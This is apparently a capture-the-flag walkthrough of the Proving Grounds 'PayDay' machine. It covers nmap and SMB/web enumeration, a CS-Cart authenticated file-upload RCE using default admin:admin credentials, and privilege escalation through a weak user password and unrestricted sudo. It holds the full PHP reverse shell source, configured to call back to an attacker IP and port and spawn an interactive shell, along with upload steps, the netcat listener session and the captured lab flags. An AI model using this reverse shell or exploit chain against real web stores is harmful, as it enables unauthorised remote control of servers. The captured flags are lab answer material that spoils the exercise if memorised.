PayDay_flow

Recon

TCP Scan

nmap -sCV -oN scans/tcp.nmap $IP
nmap -sCV -oN scans/tcp.nmap $IP
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 14:26 +0800
Nmap scan report for 192.168.142.39
Host is up (0.049s latency).
Not shown: 992 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: STLS PIPELINING TOP UIDL RESP-CODES SASL CAPA
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IDLE LOGINDISABLEDA0001 OK SASL-IR Capability completed IMAP4rev1 STARTTLS LITERAL+ THREAD=REFERENCES SORT UNSELECT CHILDREN LOGIN-REFERRALS NAMESPACE MULTIAPPEND
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: IDLE OK SASL-IR Capability completed IMAP4rev1 AUTH=PLAINA0001 LITERAL+ THREAD=REFERENCES SORT UNSELECT CHILDREN LOGIN-REFERRALS NAMESPACE MULTIAPPEND
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_pop3-capabilities: PIPELINING USER TOP UIDL RESP-CODES SASL(PLAIN) CAPA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name:
|   Domain name:
|   FQDN: payday
|_  System time: 2026-06-23T02:27:13-04:00
|_clock-skew: mean: 40m06s, deviation: 1h37m59s, median: 5s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

UDP Scan (Top 20)

sudo nmap -sU --top-ports 20 -oN scans/udp.nmap $IP
sudo nmap -sU --top-ports 20 -oN scans/udp.nmap $IP
[sudo] password for hans:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 14:26 +0800
Nmap scan report for 192.168.142.39
Host is up (0.0083s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   closed        isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

Service Enumeration

Web

Main Page

http://192.168.142.39/

Register Account

http://192.168.142.39/index.php?target=profiles&mode=add

ExploitDB

https://www.exploit-db.com/exploits/48891

# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE

get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!

https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

1. Visit "cs-cart" /admin.php and login (Remember: You need to login on **ADMIN** section not on the regular **USER** section).
2. Under **Look and Feel** section click on "**template editor**".
3. And under that section, upload your malicious **.php** file, make sure you rename it to **.phtml** before you upload.
4. If successful, you should be able to get a **RCE**.
5. For example, grab this file -> [https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php](https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php) and rename it to whoami.phtml
6. Now, visit http://[victim]/skins/whoami.phtml
7. And you should see '**www-data**' or '**apache**' etc as the output.

Managed to login using admin:admin on http://192.168.142.39/admin.php

KIV

POP3/IMAP

Directory brute force

feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o scans/ferox.md

Virtual host brute force

ffuf -u http://$IP -H "Host: FUZZ.domain" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -o scans/ffuf.html -of html

SMB

List available shares via null session

smbclient -L //$IP -N | tee scans/smbclient.md

Null session enum: users, groups, shares, password policy

nullinux $IP | tee scans/nullinux.md

Deep SMB enum - old Samba

enum4linux -a $IP | tee scans/enum4linux.md

Deep SMB enum - newer Samba

enum4linux-ng $IP | tee scans/enum4linux-ng.md

SMTP

User enumeration via VRFY/EXPN

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t $IP | tee scans/smtp-user-enum.md

SNMP

Community string enum - leaks processes, users, installed software

snmpbulkwalk -v2c -c public $IP | tee scans/snmp.md

for v1

snmpwalk -v1 -c public $IP | tee scans/snmpv1.txt

Others


Foothold

CS-Cart Exploit

https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

1. Visit "cs-cart" /admin.php and login (Remember: You need to login on **ADMIN** section not on the regular **USER** section).
2. Under **Look and Feel** section click on "**template editor**".
3. And under that section, upload your malicious **.php** file, make sure you rename it to **.phtml** before you upload.
4. If successful, you should be able to get a **RCE**.
5. For example, grab this file -> [https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php](https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php) and rename it to whoami.phtml
6. Now, visit http://[victim]/skins/whoami.phtml
7. And you should see '**www-data**' or '**apache**' etc as the output.

PHP Reverse Shell

https://www.revshells.com/

Create a shell.phtml with a PHP reverse shell:

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.232';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Upload shell.phtml

Shell

Start Listener and navigate to http://192.168.142.39/skins/shell.phtml:

Stabilise Shell:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
sh: python3: not found
$ ^[s: not found
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@payday:/$ ^Z
zsh: suspended  nc -lvnp 1234

┌──(hans㉿KaliKatak)-[~/…/Hax/Practice/PGPractice/PayDay]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 1234

www-data@payday:/$ export TERM=xterm
www-data@payday:/$

user flag

www-data@payday:/var/www$ cd /home
www-data@payday:/home$ ls -al
total 12
drwxr-xr-x  3 root    root    4096 Apr 12  2016 .
drwxr-xr-x 21 root    root    4096 Apr 24  2008 ..
drwxr-xr-x  2 patrick patrick 4096 Mar 25  2020 patrick
www-data@payday:/home$ cd patrick/
www-data@payday:/home/patrick$ ls -al
total 24
drwxr-xr-x 2 patrick patrick 4096 Mar 25  2020 .
drwxr-xr-x 3 root    root    4096 Apr 12  2016 ..
-rw------- 1 patrick patrick    0 Mar 25  2020 .bash_history
-rw-r--r-- 1 patrick patrick  220 Apr 24  2008 .bash_logout
-rw-r--r-- 1 patrick patrick 2298 Apr 24  2008 .bashrc
-rw-r--r-- 1 patrick patrick  566 Apr 24  2008 .profile
-rw-r--r-- 1 patrick patrick   33 Jun 23 02:26 local.txt
www-data@payday:/home/patrick$ whoami && hostname && cat local.txt
www-data
payday
6d57350eea4841d35815135548589837

Privilege Escalation

Low-Hanging Fruits

Linux

www-data@payday:/home/patrick$ ls -al /etc/cron.*
/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 Apr 24  2008 .
drwxr-xr-x 70 root root 4096 Aug 20  2025 ..
-rw-r--r--  1 root root  102 Dec 20  2006 .placeholder
-rw-r--r--  1 root root  456 Oct  4  2007 php5

/etc/cron.daily:
total 56
drwxr-xr-x  2 root root 4096 Apr 24  2008 .
drwxr-xr-x 70 root root 4096 Aug 20  2025 ..
-rw-r--r--  1 root root  102 Dec 20  2006 .placeholder
-rwxr-xr-x  1 root root  633 Oct  4  2007 apache2
-rwxr-xr-x  1 root root 5811 Oct 15  2007 apt
-rwxr-xr-x  1 root root  314 Sep 15  2007 aptitude
-rwxr-xr-x  1 root root  502 May 15  2007 bsdmainutils
-rwxr-xr-x  1 root root  473 Oct  3  2007 find
-rwxr-xr-x  1 root root   89 Jun 19  2006 logrotate
-rwxr-xr-x  1 root root  946 May 23  2007 man-db
-rwxr-xr-x  1 root root  383 Oct  4  2007 samba
-rwxr-xr-x  1 root root 3283 Dec 20  2006 standard
-rwxr-xr-x  1 root root 1309 Sep 17  2007 sysklogd

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Apr 24  2008 .
drwxr-xr-x 70 root root 4096 Aug 20  2025 ..
-rw-r--r--  1 root root  102 Dec 20  2006 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x  2 root root 4096 Apr 24  2008 .
drwxr-xr-x 70 root root 4096 Aug 20  2025 ..
-rw-r--r--  1 root root  102 Dec 20  2006 .placeholder
-rwxr-xr-x  1 root root  129 Dec 20  2006 standard

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Apr 24  2008 .
drwxr-xr-x 70 root root 4096 Aug 20  2025 ..
-rw-r--r--  1 root root  102 Dec 20  2006 .placeholder
-rwxr-xr-x  1 root root  520 May 23  2007 man-db
-rwxr-xr-x  1 root root 1942 May 15  2007 popularity-contest
-rwxr-xr-x  1 root root 1220 Sep 17  2007 sysklogd
www-data@payday:/home/patrick$ find / -perm -4000 -type f 2>/dev/null
/lib/dhcp3-client/call-dhclient-script
/sbin/umount.cifs
/sbin/mount.cifs
/bin/fusermount
/bin/ping
/bin/ping6
/bin/check-foreground-console
/bin/umount
/bin/su
/bin/mount
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/mtr
/usr/bin/arping
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/smbmnt
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/smbumount
www-data@payday:/home/patrick$ /sbin/ss -tlnp
Recv-Q Send-Q             Local Address:Port               Peer Address:Port
0      0                              *:993                           *:*
0      0                              *:995                           *:*
0      0                      127.0.0.1:3306                          *:*
0      0                              *:139                           *:*
0      0                              *:110                           *:*
0      0                              *:143                           *:*
0      0                             :::80                           :::*      users:(("sh",5575,3),("sh",5579,3),("python",5580,3),("bash",5581,3),("ss",5613,3))
0      0                             :::22                           :::*
0      0                              *:445                           *:*

MySQL/MariaDB possibly listening on port 3306.

www-data@payday:/home/patrick$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash

patrick

User patrick's password is patrick.

ww-data@payday:/home/patrick$ su patrick
Password:
patrick@payday:~$

And patrick can sudo ALL.

patrick@payday:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:
User patrick may run the following commands on this host:
    (ALL) ALL

root flag

patrick@payday:~$ sudo su -
root@payday:~# whoami && hostname && cat /root/proof.txt
root
payday
5c5265a432a52c7ccdf2035612c3487b